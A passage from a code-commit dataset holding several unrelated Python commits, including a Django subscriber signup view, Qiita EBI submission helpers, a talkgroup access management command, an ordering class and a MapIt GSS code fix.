return HttpResponseRedirect('/success/')
else:
form = SubscriberForm()
return render(request, template, {'form':form})
<commit_msg>Create the Subscriber Form - Part II > Update the View<commit_after>from django.shortcuts import render
from django.contrib.auth.models import User
from django.http import HttpResponseRedirect
from .forms import SubscriberForm
from .models import Subscriber
def subscriber_new(request, template='subscribers/subscriber_new.html'):
if request.method == 'POST':
form = SubscriberForm(request.POST)
if form.is_valid():
# Unpack form values
username = form.cleaned_data['username']
password = form.cleaned_data['password1']
email = form.cleaned_data['email']
first_name = form.cleaned_data['first_name']
last_name = form.cleaned_data['last_name']
# Create the User record
user = User(username=username, email=email,
first_name=first_name, last_name=last_name)
user.set_password(password)
user.save()
# Create Subscriber Record
address_one = form.cleaned_data['address_one']
address_two = form.cleaned_data['address_two']
city = form.cleaned_data['city']
state = form.cleaned_data['state']
sub = Subscriber(address_one=address_one, address_two=address_two,
city=city, state=state, user_rec=user)
sub.save()
# Process payment (via Stripe)
# Auto login the user
return HttpResponseRedirect('/success/')
else:
form = SubscriberForm()
return render(request, template, {'form':form})
|
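The view in the record above pulls username, password1, email, first_name, last_name, address_one, address_two, city, and state out of SubscriberForm.cleaned_data, but the form itself is not part of the record. A minimal sketch of a form exposing those keys (field types, lengths, and the password-confirmation check are assumptions, not the project's actual form):

from django import forms

# Hypothetical SubscriberForm matching the cleaned_data keys used in the
# view above; the real project's form may differ.
class SubscriberForm(forms.Form):
    username = forms.CharField(max_length=150)
    email = forms.EmailField()
    first_name = forms.CharField(max_length=30)
    last_name = forms.CharField(max_length=30)
    password1 = forms.CharField(widget=forms.PasswordInput)
    password2 = forms.CharField(widget=forms.PasswordInput)
    address_one = forms.CharField(max_length=100)
    address_two = forms.CharField(max_length=100, required=False)
    city = forms.CharField(max_length=60)
    state = forms.CharField(max_length=2)

    def clean(self):
        # Reject mismatched passwords so the view can trust password1.
        cleaned = super(SubscriberForm, self).clean()
        if cleaned.get('password1') != cleaned.get('password2'):
            raise forms.ValidationError('Passwords do not match.')
        return cleaned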
872159c61ee20be1befdfa21e42c54f2b420c7b8
|
qiita_ware/commands.py
|
qiita_ware/commands.py
|
# -----------------------------------------------------------------------------
# Copyright (c) 2014--, The Qiita Development Team.
#
# Distributed under the terms of the BSD 3-clause License.
#
# The full license is in the file LICENSE, distributed with this software.
# -----------------------------------------------------------------------------
from os.path import join
from os import makedirs
from functools import partial
from qiita_db.study import Study
from qiita_db.metadata_template import PrepTemplate, SampleTemplate
from qiita_ware.ebi import EBISubmission
def generate(study_id, output_dir, action, investigation_type):
# Get study information from database
study_id_str = str(study_id)
study = Study(study_id)
submission = EBISubmission(study_id_str, study.title,
study.info['study_abstract'],
investigation_type)
# Get study-specific output directory and set filepaths
get_output_fp = partial(join, output_dir)
study_fp = get_output_fp('study.xml')
sample_fp = get_output_fp('sample.xml')
experiment_fp = get_output_fp('experiment.xml')
run_fp = get_output_fp('run.xml')
submission_fp = get_output_fp('submission.xml')
sample_template_fp = get_output_fp('sample_template.tsv')
sample_template = SampleTemplate(study.sample_template)
sample_template.to_file(sample_template_fp)
submission.write_all_xml_files(study_fp, sample_fp, experiment_fp, run_fp,
submission_fp, action)
def generate_from_files(study_id, sample_template, prep_template_fps,
fastq_dir, investigation_type, output_dir):
study = Study(study_id)
study_id_str = str(study_id)
prep_templates = [open(prep_template_fp)
for prep_template_fp in prep_template_fps]
submission = from_templates_and_per_sample_fastqs(
study_id_str, study.title, study.info['study_abstract'],
investigation_type, sample_template, prep_templates, fastq_dir)
# Get study-specific output directory and set filepaths
get_output_fp = partial(join, output_dir)
study_fp = get_output_fp('study.xml')
sample_fp = get_output_fp('sample.xml')
experiment_fp = get_output_fp('experiment.xml')
run_fp = get_output_fp('run.xml')
submission_fp = get_output_fp('submission.xml')
submission.write_all_xml_files(study_fp, sample_fp, experiment_fp, run_fp,
submission_fp, action)
for prep_template in prep_templates:
prep_template.close()
|
Add library code for ebi functions
|
Add library code for ebi functions
|
Python
|
bsd-3-clause
|
squirrelo/qiita,ElDeveloper/qiita,wasade/qiita,RNAer/qiita,squirrelo/qiita,antgonza/qiita,adamrp/qiita,adamrp/qiita,antgonza/qiita,antgonza/qiita,adamrp/qiita,biocore/qiita,wasade/qiita,josenavas/QiiTa,ElDeveloper/qiita,antgonza/qiita,RNAer/qiita,squirrelo/qiita,wasade/qiita,RNAer/qiita,josenavas/QiiTa,RNAer/qiita,josenavas/QiiTa,biocore/qiita,squirrelo/qiita,adamrp/qiita,ElDeveloper/qiita,ElDeveloper/qiita,biocore/qiita,josenavas/QiiTa,biocore/qiita
|
Add library code for ebi functions
|
# -----------------------------------------------------------------------------
# Copyright (c) 2014--, The Qiita Development Team.
#
# Distributed under the terms of the BSD 3-clause License.
#
# The full license is in the file LICENSE, distributed with this software.
# -----------------------------------------------------------------------------
from os.path import join
from os import makedirs
from functools import partial
from qiita_db.study import Study
from qiita_db.metadata_template import PrepTemplate, SampleTemplate
from qiita_ware.ebi import EBISubmission
def generate(study_id, output_dir, action, investigation_type):
# Get study information from database
study_id_str = str(study_id)
study = Study(study_id)
submission = EBISubmission(study_id_str, study.title,
study.info['study_abstract'],
investigation_type)
# Get study-specific output directory and set filepaths
get_output_fp = partial(join, output_dir)
study_fp = get_output_fp('study.xml')
sample_fp = get_output_fp('sample.xml')
experiment_fp = get_output_fp('experiment.xml')
run_fp = get_output_fp('run.xml')
submission_fp = get_output_fp('submission.xml')
sample_template_fp = get_output_fp('sample_template.tsv')
sample_template = SampleTemplate(study.sample_template)
sample_template.to_file(sample_template_fp)
submission.write_all_xml_files(study_fp, sample_fp, experiment_fp, run_fp,
submission_fp, action)
def generate_from_files(study_id, sample_template, prep_template_fps,
fastq_dir, investigation_type, output_dir):
study = Study(study_id)
study_id_str = str(study_id)
prep_templates = [open(prep_template_fp)
for prep_template_fp in prep_template_fps]
submission = from_templates_and_per_sample_fastqs(
study_id_str, study.title, study.info['study_abstract'],
investigation_type, sample_template, prep_templates, fastq_dir)
# Get study-specific output directory and set filepaths
get_output_fp = partial(join, output_dir)
study_fp = get_output_fp('study.xml')
sample_fp = get_output_fp('sample.xml')
experiment_fp = get_output_fp('experiment.xml')
run_fp = get_output_fp('run.xml')
submission_fp = get_output_fp('submission.xml')
submission.write_all_xml_files(study_fp, sample_fp, experiment_fp, run_fp,
submission_fp, action)
for prep_template in prep_templates:
prep_template.close()
|
<commit_before><commit_msg>Add library code for ebi functions<commit_after>
|
# -----------------------------------------------------------------------------
# Copyright (c) 2014--, The Qiita Development Team.
#
# Distributed under the terms of the BSD 3-clause License.
#
# The full license is in the file LICENSE, distributed with this software.
# -----------------------------------------------------------------------------
from os.path import join
from os import makedirs
from functools import partial
from qiita_db.study import Study
from qiita_db.metadata_template import PrepTemplate, SampleTemplate
from qiita_ware.ebi import EBISubmission
def generate(study_id, output_dir, action, investigation_type):
# Get study information from database
study_id_str = str(study_id)
study = Study(study_id)
submission = EBISubmission(study_id_str, study.title,
study.info['study_abstract'],
investigation_type)
# Get study-specific output directory and set filepaths
get_output_fp = partial(join, output_dir)
study_fp = get_output_fp('study.xml')
sample_fp = get_output_fp('sample.xml')
experiment_fp = get_output_fp('experiment.xml')
run_fp = get_output_fp('run.xml')
submission_fp = get_output_fp('submission.xml')
sample_template_fp = get_output_fp('sample_template.tsv')
sample_template = SampleTemplate(study.sample_template)
sample_template.to_file(sample_template_fp)
submission.write_all_xml_files(study_fp, sample_fp, experiment_fp, run_fp,
submission_fp, action)
def generate_from_files(study_id, sample_template, prep_template_fps,
fastq_dir, investigation_type, output_dir):
study = Study(study_id)
study_id_str = str(study_id)
prep_templates = [open(prep_template_fp)
for prep_template_fp in prep_template_fps]
submission = from_templates_and_per_sample_fastqs(
study_id_str, study.title, study.info['study_abstract'],
investigation_type, sample_template, prep_templates, fastq_dir)
# Get study-specific output directory and set filepaths
get_output_fp = partial(join, output_dir)
study_fp = get_output_fp('study.xml')
sample_fp = get_output_fp('sample.xml')
experiment_fp = get_output_fp('experiment.xml')
run_fp = get_output_fp('run.xml')
submission_fp = get_output_fp('submission.xml')
submission.write_all_xml_files(study_fp, sample_fp, experiment_fp, run_fp,
submission_fp, action)
for prep_template in prep_templates:
prep_template.close()
|
Add library code for ebi functions# -----------------------------------------------------------------------------
# Copyright (c) 2014--, The Qiita Development Team.
#
# Distributed under the terms of the BSD 3-clause License.
#
# The full license is in the file LICENSE, distributed with this software.
# -----------------------------------------------------------------------------
from os.path import join
from os import makedirs
from functools import partial
from qiita_db.study import Study
from qiita_db.metadata_template import PrepTemplate, SampleTemplate
from qiita_ware.ebi import EBISubmission
def generate(study_id, output_dir, action, investigation_type):
# Get study information from database
study_id_str = str(study_id)
study = Study(study_id)
submission = EBISubmission(study_id_str, study.title,
study.info['study_abstract'],
investigation_type)
# Get study-specific output directory and set filepaths
get_output_fp = partial(join, output_dir)
study_fp = get_output_fp('study.xml')
sample_fp = get_output_fp('sample.xml')
experiment_fp = get_output_fp('experiment.xml')
run_fp = get_output_fp('run.xml')
submission_fp = get_output_fp('submission.xml')
sample_template_fp = get_output_fp('sample_template.tsv')
sample_template = SampleTemplate(study.sample_template)
sample_template.to_file(sample_template_fp)
submission.write_all_xml_files(study_fp, sample_fp, experiment_fp, run_fp,
submission_fp, action)
def generate_from_files(study_id, sample_template, prep_template_fps,
fastq_dir, investigation_type, output_dir):
study = Study(study_id)
study_id_str = str(study_id)
prep_templates = [open(prep_template_fp)
for prep_template_fp in prep_template_fps]
submission = from_templates_and_per_sample_fastqs(
study_id_str, study.title, study.info['study_abstract'],
investigation_type, sample_template, prep_templates, fastq_dir)
# Get study-specific output directory and set filepaths
get_output_fp = partial(join, output_dir)
study_fp = get_output_fp('study.xml')
sample_fp = get_output_fp('sample.xml')
experiment_fp = get_output_fp('experiment.xml')
run_fp = get_output_fp('run.xml')
submission_fp = get_output_fp('submission.xml')
submission.write_all_xml_files(study_fp, sample_fp, experiment_fp, run_fp,
submission_fp, action)
for prep_template in prep_templates:
prep_template.close()
|
<commit_before><commit_msg>Add library code for ebi functions<commit_after># -----------------------------------------------------------------------------
# Copyright (c) 2014--, The Qiita Development Team.
#
# Distributed under the terms of the BSD 3-clause License.
#
# The full license is in the file LICENSE, distributed with this software.
# -----------------------------------------------------------------------------
from os.path import join
from os import makedirs
from functools import partial
from qiita_db.study import Study
from qiita_db.metadata_template import PrepTemplate, SampleTemplate
from qiita_ware.ebi import EBISubmission
def generate(study_id, output_dir, action, investigation_type):
# Get study information from database
study_id_str = str(study_id)
study = Study(study_id)
submission = EBISubmission(study_id_str, study.title,
study.info['study_abstract'],
investigation_type)
# Get study-specific output directory and set filepaths
get_output_fp = partial(join, output_dir)
study_fp = get_output_fp('study.xml')
sample_fp = get_output_fp('sample.xml')
experiment_fp = get_output_fp('experiment.xml')
run_fp = get_output_fp('run.xml')
submission_fp = get_output_fp('submission.xml')
sample_template_fp = get_output_fp('sample_template.tsv')
sample_template = SampleTemplate(study.sample_template)
sample_template.to_file(sample_template_fp)
submission.write_all_xml_files(study_fp, sample_fp, experiment_fp, run_fp,
submission_fp, action)
def generate_from_files(study_id, sample_template, prep_template_fps,
fastq_dir, investigation_type, output_dir):
study = Study(study_id)
study_id_str = str(study_id)
prep_templates = [open(prep_template_fp)
for prep_template_fp in prep_template_fps]
submission = from_templates_and_per_sample_fastqs(
study_id_str, study.title, study.info['study_abstract'],
investigation_type, sample_template, prep_templates, fastq_dir)
# Get study-specific output directory and set filepaths
get_output_fp = partial(join, output_dir)
study_fp = get_output_fp('study.xml')
sample_fp = get_output_fp('sample.xml')
experiment_fp = get_output_fp('experiment.xml')
run_fp = get_output_fp('run.xml')
submission_fp = get_output_fp('submission.xml')
submission.write_all_xml_files(study_fp, sample_fp, experiment_fp, run_fp,
submission_fp, action)
for prep_template in prep_templates:
prep_template.close()
|
|
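A minimal driver for the generate() helper above, assuming a study with ID 1 exists; the 'ADD' action and 'metagenome' investigation type are placeholders. Note that generate() expects output_dir to exist already (presumably why makedirs is imported), and that generate_from_files references an action name that is not among its parameters, so it would raise a NameError as written:

from os import makedirs
from os.path import exists

from qiita_ware.commands import generate

# Placeholder values, not from the commit.
output_dir = '/tmp/ebi_submission_1'
if not exists(output_dir):
    makedirs(output_dir)
generate(1, output_dir, 'ADD', 'metagenome')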
7589f2364a73d75711b596ce8ab9581986bd4129
|
radio/management/commands/set_default_access_tg.py
|
radio/management/commands/set_default_access_tg.py
|
import sys
import datetime
import csv
from django.core.management.base import BaseCommand, CommandError
from django.conf import settings
from django.utils import timezone
from radio.models import *
class Command(BaseCommand):
help = 'Helper for new TalkGroup Access'
def add_arguments(self, parser):
parser.add_argument('access_group_name')
def handle(self, *args, **options):
access_menu(self, options)
def access_menu(self, options):
try:
access_gp = TalkGroupAccess.objects.get(name=options['access_group_name'])
except TalkGroupAccess.DoesNotExist:
self.stdout.write(self.style.ERROR('Talk Group Access List [{}] does not exist, check case and spelling'.format(options['access_group_name'])))
all_access_names = TalkGroupAccess.objects.all()
if all_access_names:
self.stdout.write('Current Talk Group Access lists in the database:')
for tg in all_access_names:
self.stdout.write(tg.name)
else:
self.stdout.write(self.style.ERROR('**There are no Talk Group Access lists in the database'))
return
self.stdout.write('Setting all current public Talk Groups into {}'.format(access_gp.name))
ct=0
for tg in TalkGroupWithSystem.objects.filter(public=True):
access_gp.talkgroups.add(tg)
ct += 1
self.stdout.write(self.style.SUCCESS('Added {} TalkGroups to Talk Group Access List - {}'.format(ct, access_gp.name)))
|
Add utility to setup TalkGroupAccess talkgroups
|
Add utility to setup TalkGroupAccess talkgroups
The utility will add all TalkGroups that are marked as public into the specified TalkGroup Access list
|
Python
|
mit
|
ScanOC/trunk-player,ScanOC/trunk-player,ScanOC/trunk-player,ScanOC/trunk-player
|
Add utility to setup TalkGroupAccess talkgroups
The utility will add all TalkGroups that are marked as public into the specified TalkGroup Access list
|
import sys
import datetime
import csv
from django.core.management.base import BaseCommand, CommandError
from django.conf import settings
from django.utils import timezone
from radio.models import *
class Command(BaseCommand):
help = 'Helper for new TalkGroup Access'
def add_arguments(self, parser):
parser.add_argument('access_group_name')
def handle(self, *args, **options):
access_menu(self, options)
def access_menu(self, options):
try:
access_gp = TalkGroupAccess.objects.get(name=options['access_group_name'])
except TalkGroupAccess.DoesNotExist:
self.stdout.write(self.style.ERROR('Talk Group Access List [{}] does not exist, check case and spelling'.format(options['access_group_name'])))
all_access_names = TalkGroupAccess.objects.all()
if all_access_names:
self.stdout.write('Current Talk Group Access lists in the database:')
for tg in all_access_names:
self.stdout.write(tg.name)
else:
self.stdout.write(self.style.ERROR('**There are no Talk Group Access lists in the database'))
return
self.stdout.write('Setting all current public Talk Groups into {}'.format(access_gp.name))
ct=0
for tg in TalkGroupWithSystem.objects.filter(public=True):
access_gp.talkgroups.add(tg)
ct += 1
self.stdout.write(self.style.SUCCESS('Added {} TalkGroups to Talk Group Access List - {}'.format(ct, access_gp.name)))
|
<commit_before><commit_msg>Add utility to setup TalkGroupAccess talkgroups
The utility will add all TalkGroups that are marked as public into the specified TalkGroup Access list<commit_after>
|
import sys
import datetime
import csv
from django.core.management.base import BaseCommand, CommandError
from django.conf import settings
from django.utils import timezone
from radio.models import *
class Command(BaseCommand):
help = 'Helper for new TalkGroup Access'
def add_arguments(self, parser):
parser.add_argument('access_group_name')
def handle(self, *args, **options):
access_menu(self, options)
def access_menu(self, options):
try:
access_gp = TalkGroupAccess.objects.get(name=options['access_group_name'])
except TalkGroupAccess.DoesNotExist:
self.stdout.write(self.style.ERROR('Talk Group Access List [{}] does not exist, check case and spelling'.format(options['access_group_name'])))
all_access_names = TalkGroupAccess.objects.all()
if all_access_names:
self.stdout.write('Current Talk Group Access lists in the database:')
for tg in all_access_names:
self.stdout.write(tg.name)
else:
self.stdout.write(self.style.ERROR('**There are no Talk Group Access lists in the database'))
return
self.stdout.write('Setting all current public Talk Groups into {}'.format(access_gp.name))
ct=0
for tg in TalkGroupWithSystem.objects.filter(public=True):
access_gp.talkgroups.add(tg)
ct += 1
self.stdout.write(self.style.SUCCESS('Added {} TalkGroups to Talk Group Access List - {}'.format(ct, access_gp.name)))
|
Add utility to setup TalkGroupAccess talkgroups
The utility will add all TalkGroups that are marked as public into the specified TalkGroup Access listimport sys
import datetime
import csv
from django.core.management.base import BaseCommand, CommandError
from django.conf import settings
from django.utils import timezone
from radio.models import *
class Command(BaseCommand):
help = 'Helper for new TalkGroup Access'
def add_arguments(self, parser):
parser.add_argument('access_group_name')
def handle(self, *args, **options):
access_menu(self, options)
def access_menu(self, options):
try:
access_gp = TalkGroupAccess.objects.get(name=options['access_group_name'])
except TalkGroupAccess.DoesNotExist:
self.stdout.write(self.style.ERROR('Talk Group Access List [{}] does not exist, check case and spelling'.format(options['access_group_name'])))
all_access_names = TalkGroupAccess.objects.all()
if all_access_names:
self.stdout.write('Current Talk Group Access lists in the database:')
for tg in all_access_names:
self.stdout.write(tg.name)
else:
self.stdout.write(self.style.ERROR('**There are no Talk Group Access lists in the database'))
return
self.stdout.write('Setting all current public Talk Groups into {}'.format(access_gp.name))
ct=0
for tg in TalkGroupWithSystem.objects.filter(public=True):
access_gp.talkgroups.add(tg)
ct += 1
self.stdout.write(self.style.SUCCESS('Added {} TalkGroups to Talk Group Access List - {}'.format(ct, access_gp.name)))
|
<commit_before><commit_msg>Add utility to setup TalkGroupAccess talkgroups
The utility will add all TalkGroups that are marked as public into the specified TalkGroup Access list<commit_after>import sys
import datetime
import csv
from django.core.management.base import BaseCommand, CommandError
from django.conf import settings
from django.utils import timezone
from radio.models import *
class Command(BaseCommand):
help = 'Helper for new TalkGroup Access'
def add_arguments(self, parser):
parser.add_argument('access_group_name')
def handle(self, *args, **options):
access_menu(self, options)
def access_menu(self, options):
try:
access_gp = TalkGroupAccess.objects.get(name=options['access_group_name'])
except TalkGroupAccess.DoesNotExist:
self.stdout.write(self.style.ERROR('Talk Group Access List [{}] does not exist, check case and spelling'.format(options['access_group_name'])))
all_access_names = TalkGroupAccess.objects.all()
if all_access_names:
self.stdout.write('Current Talk Group Access lists in the database:')
for tg in all_access_names:
self.stdout.write(tg.name)
else:
self.stdout.write(self.style.ERROR('**There are no Talk Group Access lists in the database'))
return
self.stdout.write('Setting all current public Talk Groups into {}'.format(access_gp.name))
ct=0
for tg in TalkGroupWithSystem.objects.filter(public=True):
access_gp.talkgroups.add(tg)
ct += 1
self.stdout.write(self.style.SUCCESS('Added {} TalkGroups to Talk Group Access List - {}'.format(ct, access_gp.name)))
|
|
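Management commands like the one above are usually run through manage.py, but they can also be driven from Python with Django's call_command; the access-list name below is a placeholder:

from django.core.management import call_command

# Adds every public TalkGroup to the "Public" access list; if the list
# does not exist, the command prints the available names and returns.
call_command('set_default_access_tg', 'Public')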
b0783691bc0855ad154b649ddfabe7572f79f7fd
|
ordering/__init__.py
|
ordering/__init__.py
|
from fractions import Fraction
class Ordering:
_start = object()
_end = object()
def __init__(self):
self._labels = {
self._start: Fraction(0),
self._end: Fraction(1)
}
self._successors = {
self._start: self._end
}
self._predecessors = {
self._end: self._start
}
def insert_after(self, existing_item, new_item):
self._labels[new_item] = (self._labels[existing_item] + self._labels[self._successors[existing_item]]) / 2
self._successors[new_item] = self._successors[existing_item]
self._predecessors[new_item] = existing_item
self._predecessors[self._successors[existing_item]] = new_item
self._successors[existing_item] = new_item
def insert_before(self, existing_item, new_item):
self.insert_after(self._predecessors[existing_item], new_item)
def insert_start(self, new_item):
self.insert_after(self._start, new_item)
def insert_end(self, new_item):
self.insert_before(self._end, new_item)
def compare(self, left_item, right_item):
return self._labels[left_item] < self._labels[right_item]
|
Add class representing an ordering on elements
|
Add class representing an ordering on elements
|
Python
|
mit
|
madman-bob/python-order-maintenance
|
Add class representing an ordering on elements
|
from fractions import Fraction
class Ordering:
_start = object()
_end = object()
def __init__(self):
self._labels = {
self._start: Fraction(0),
self._end: Fraction(1)
}
self._successors = {
self._start: self._end
}
self._predecessors = {
self._end: self._start
}
def insert_after(self, existing_item, new_item):
self._labels[new_item] = (self._labels[existing_item] + self._labels[self._successors[existing_item]]) / 2
self._successors[new_item] = self._successors[existing_item]
self._predecessors[new_item] = existing_item
self._predecessors[self._successors[existing_item]] = new_item
self._successors[existing_item] = new_item
def insert_before(self, existing_item, new_item):
self.insert_after(self._predecessors[existing_item], new_item)
def insert_start(self, new_item):
self.insert_after(self._start, new_item)
def insert_end(self, new_item):
self.insert_before(self._end, new_item)
def compare(self, left_item, right_item):
return self._labels[left_item] < self._labels[right_item]
|
<commit_before><commit_msg>Add class representing an ordering on elements<commit_after>
|
from fractions import Fraction
class Ordering:
_start = object()
_end = object()
def __init__(self):
self._labels = {
self._start: Fraction(0),
self._end: Fraction(1)
}
self._successors = {
self._start: self._end
}
self._predecessors = {
self._end: self._start
}
def insert_after(self, existing_item, new_item):
self._labels[new_item] = (self._labels[existing_item] + self._labels[self._successors[existing_item]]) / 2
self._successors[new_item] = self._successors[existing_item]
self._predecessors[new_item] = existing_item
self._predecessors[self._successors[existing_item]] = new_item
self._successors[existing_item] = new_item
def insert_before(self, existing_item, new_item):
self.insert_after(self._predecessors[existing_item], new_item)
def insert_start(self, new_item):
self.insert_after(self._start, new_item)
def insert_end(self, new_item):
self.insert_before(self._end, new_item)
def compare(self, left_item, right_item):
return self._labels[left_item] < self._labels[right_item]
|
Add class representing an ordering on elementsfrom fractions import Fraction
class Ordering:
_start = object()
_end = object()
def __init__(self):
self._labels = {
self._start: Fraction(0),
self._end: Fraction(1)
}
self._successors = {
self._start: self._end
}
self._predecessors = {
self._end: self._start
}
def insert_after(self, existing_item, new_item):
self._labels[new_item] = (self._labels[existing_item] + self._labels[self._successors[existing_item]]) / 2
self._successors[new_item] = self._successors[existing_item]
self._predecessors[new_item] = existing_item
self._predecessors[self._successors[existing_item]] = new_item
self._successors[existing_item] = new_item
def insert_before(self, existing_item, new_item):
self.insert_after(self._predecessors[existing_item], new_item)
def insert_start(self, new_item):
self.insert_after(self._start, new_item)
def insert_end(self, new_item):
self.insert_before(self._end, new_item)
def compare(self, left_item, right_item):
return self._labels[left_item] < self._labels[right_item]
|
<commit_before><commit_msg>Add class representing an ordering on elements<commit_after>from fractions import Fraction
class Ordering:
_start = object()
_end = object()
def __init__(self):
self._labels = {
self._start: Fraction(0),
self._end: Fraction(1)
}
self._successors = {
self._start: self._end
}
self._predecessors = {
self._end: self._start
}
def insert_after(self, existing_item, new_item):
self._labels[new_item] = (self._labels[existing_item] + self._labels[self._successors[existing_item]]) / 2
self._successors[new_item] = self._successors[existing_item]
self._predecessors[new_item] = existing_item
self._predecessors[self._successors[existing_item]] = new_item
self._successors[existing_item] = new_item
def insert_before(self, existing_item, new_item):
self.insert_after(self._predecessors[existing_item], new_item)
def insert_start(self, new_item):
self.insert_after(self._start, new_item)
def insert_end(self, new_item):
self.insert_before(self._end, new_item)
def compare(self, left_item, right_item):
return self._labels[left_item] < self._labels[right_item]
|
|
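The Ordering class above keeps a Fraction label per item and halves the gap between neighbours on each insert, so compare() reduces to a single label comparison. A short usage sketch with placeholder items:

from ordering import Ordering

ordering = Ordering()
ordering.insert_start('a')        # order: a
ordering.insert_end('c')          # order: a, c
ordering.insert_after('a', 'b')   # order: a, b, c
assert ordering.compare('a', 'b')       # 'a' precedes 'b'
assert not ordering.compare('c', 'b')   # 'c' does not precede 'b'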
ff4f9810e3cccf89858f62bf1e6a3d060f7168ad
|
mapit/management/commands/mapit_UK_fix_2013-10-south-tynedale.py
|
mapit/management/commands/mapit_UK_fix_2013-10-south-tynedale.py
|
# This script is to be run as a one-off to fix up a specific boundary that
# the Ordnance Survey gave the wrong code to in the 2013-10 edition of the
# boundary line. It must be run *before* importing the 2014-05 edition.
from optparse import make_option
from django.core.management.base import NoArgsCommand
from django.contrib.gis.gdal import *
from mapit.models import Area, CodeType
class Command(NoArgsCommand):
help = 'Fix the GSS code of UTE South Tynedale so that we can import the May 2014 boundary line'
option_list = NoArgsCommand.option_list + (
make_option('--commit', action='store_true', dest='commit', help='Actually update the database'),
)
def handle_noargs(self, **options):
code_version = CodeType.objects.get(code='gss')
# We need to remove the code E05009154 from the South Tynedale area
# (which lived in MapIt UK's database from generations 1 - 20)
# so that when we add it back in during the May 2014 import
# (MapIt UK's generation 22), we don't get an error from the
# boundary-line import script. Only one area should have this code at
# any given time, they can't both share it.
area = Area.objects.get(codes__code='E05009154', codes__type=code_version)
if options['commit']:
area.codes.get(code='E05009154', type=code_version).delete()
|
Add a command to fix South Tynedale's GSS code from 2013-10
|
Add a command to fix South Tynedale's GSS code from 2013-10
South Tynedale UTE was given the wrong GSS code in the last Ordnance
Survey boundary line update in November 2013. They corrected this in
the May 2014 edition, but we need to fix up our historical version of
the area in order to be able to import that.
|
Python
|
agpl-3.0
|
chris48s/mapit,Sinar/mapit,opencorato/mapit,chris48s/mapit,opencorato/mapit,Code4SA/mapit,opencorato/mapit,chris48s/mapit,Code4SA/mapit,Sinar/mapit,Code4SA/mapit
|
Add a command to fix South Tynedale's GSS code from 2013-10
South Tynedale UTE was given the wrong GSS code in the last Ordnance
Survey boundary line update in November 2013. They corrected this in
the May 2014 edition, but we need to fix up our historical version of
the area in order to be able to import that.
|
# This script is to be run as a one-off to fix up a specific boundary that
# the Ordnance Survey gave the wrong code to in the 2013-10 edition of the
# boundary line. It must be run *before* importing the 2014-05 edition.
from optparse import make_option
from django.core.management.base import NoArgsCommand
from django.contrib.gis.gdal import *
from mapit.models import Area, CodeType
class Command(NoArgsCommand):
help = 'Fix the GSS code of UTE South Tynedale so that we can import the May 2014 boundary line'
option_list = NoArgsCommand.option_list + (
make_option('--commit', action='store_true', dest='commit', help='Actually update the database'),
)
def handle_noargs(self, **options):
code_version = CodeType.objects.get(code='gss')
# We need to remove the code E05009154 from the South Tynedale area
# (which lived in MapIt UK's database from generations 1 - 20)
# so that when we add it back in during the May 2014 import
# (MapIt UK's generation 22), we don't get an error from the
# boundary-line import script. Only one area should have this code at
# any given time, they can't both share it.
area = Area.objects.get(codes__code='E05009154', codes__type=code_version)
if options['commit']:
area.codes.get(code='E05009154', type=code_version).delete()
|
<commit_before><commit_msg>Add a command to fix South Tynedale's GSS code from 2013-10
South Tynedale UTE was given the wrong GSS code in the last Ordnance
Survey boundary line update in November 2013. They corrected this in
the May 2014 edition, but we need to fix up our historical version of
the area in order to be able to import that.<commit_after>
|
# This script is to be run as a one-off to fix up a specific boundary that
# the Ordnance Survey gave the wrong code to in the 2013-10 edition of the
# boundary line. It must be run *before* importing the 2014-05 edition.
from optparse import make_option
from django.core.management.base import NoArgsCommand
from django.contrib.gis.gdal import *
from mapit.models import Area, CodeType
class Command(NoArgsCommand):
help = 'Fix the GSS code of UTE South Tynedale so that we can import the May 2014 boundary line'
option_list = NoArgsCommand.option_list + (
make_option('--commit', action='store_true', dest='commit', help='Actually update the database'),
)
def handle_noargs(self, **options):
code_version = CodeType.objects.get(code='gss')
# We need to remove the code E05009154 from the South Tynedale area
# (which lived in MapIt UK's database from generations 1 - 20)
# so that when we add it back in during the May 2014 import
# (MapIt UK's generation 22), we don't get an error from the
# boundary-line import script. Only one area should have this code at
# any given time, they can't both share it.
area = Area.objects.get(codes__code='E05009154', codes__type=code_version)
if options['commit']:
area.codes.get(code='E05009154', type=code_version).delete()
|
Add a command to fix South Tynedale's GSS code from 2013-10
South Tynedale UTE was given the wrong GSS code in the last Ordnance
Survey boundary line update in November 2013. They corrected this in
the May 2014 edition, but we need to fix up our historical version of
the area in order to be able to import that.# This script is to be run as a one-off to fix up a specific boundary that
# the Ordnance Survey gave the wrong code to in the 2013-10 edition of the
# boundary line. It must be run *before* importing the 2014-05 edition.
from optparse import make_option
from django.core.management.base import NoArgsCommand
from django.contrib.gis.gdal import *
from mapit.models import Area, CodeType
class Command(NoArgsCommand):
help = 'Fix the GSS code of UTE South Tynedale so that we can import the May 2014 boundary line'
option_list = NoArgsCommand.option_list + (
make_option('--commit', action='store_true', dest='commit', help='Actually update the database'),
)
def handle_noargs(self, **options):
code_version = CodeType.objects.get(code='gss')
# We need to remove the code E05009154 from the South Tynedale area
# (which lived in MapIt UK's database from generations 1 - 20)
# so that when we add it back in during the May 2014 import
# (MapIt UK's generation 22), we don't get an error from the
# boundary-line import script. Only one area should have this code at
# any given time, they can't both share it.
area = Area.objects.get(codes__code='E05009154', codes__type=code_version)
if options['commit']:
area.codes.get(code='E05009154', type=code_version).delete()
|
<commit_before><commit_msg>Add a command to fix South Tynedale's GSS code from 2013-10
South Tynedale UTE was given the wrong GSS code in the last Ordnance
Survey boundary line update in November 2013. They corrected this in
the May 2014 edition, but we need to fix up our historical version of
the area in order to be able to import that.<commit_after># This script is to be run as a one-off to fix up a specific boundary that
# the Ordnance Survey gave the wrong code to in the 2013-10 edition of the
# boundary line. It must be run *before* importing the 2014-05 edition.
from optparse import make_option
from django.core.management.base import NoArgsCommand
from django.contrib.gis.gdal import *
from mapit.models import Area, CodeType
class Command(NoArgsCommand):
help = 'Fix the GSS code of UTE South Tynedale so that we can import the May 2014 boundary line'
option_list = NoArgsCommand.option_list + (
make_option('--commit', action='store_true', dest='commit', help='Actually update the database'),
)
def handle_noargs(self, **options):
code_version = CodeType.objects.get(code='gss')
# We need to remove the code E05009154 from the South Tynedale area
# (which lived in MapIt UK's database from generations 1 - 20)
# so that when we add it back in during the May 2014 import
# (MapIt UK's generation 22), we don't get an error from the
# boundary-line import script. Only one area should have this code at
# any given time, they can't both share it.
area = Area.objects.get(codes__code='E05009154', codes__type=code_version)
if options['commit']:
area.codes.get(code='E05009154', type=code_version).delete()
|
|
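The command above only deletes the stale code when --commit is passed; without it, the Area lookup still runs, which doubles as a dry-run check that exactly one area holds E05009154. Driving it from Python (the dashes in the file name carry over into the command name):

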